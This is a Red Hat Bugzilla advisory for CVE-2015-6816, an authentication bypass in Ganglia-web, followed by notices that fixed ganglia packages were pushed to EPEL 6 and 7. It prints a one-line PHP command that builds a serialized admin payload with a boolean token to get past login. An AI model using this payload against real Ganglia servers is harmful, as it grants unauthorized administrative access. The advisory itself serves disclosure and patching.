Red Hat Bugzilla – Bug 1260562
CVE-2015-6816 ganglia: Bypassing Ganglia-web auth using boolean serialization
Last modified: 2015-11-08 13:24:14 EST
A vulnerability of auth bypassing was found in Ganglia-web. It's easy to bypass auth by using boolean serialization like this:
$ php -r "echo urlencode(serialize(array('user'=>'admin','group'=>'admin', 'token'=>true)));"
Created ganglia tracking bugs for this issue:
Affects: fedora-all [bug 1260563]
Affects: epel-all [bug 1260564]
ganglia-3.7.2-2.el7 has been pushed to the Fedora EPEL 7 stable repository. If problems still persist, please make note of it in this bug report.
ganglia-3.7.2-2.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.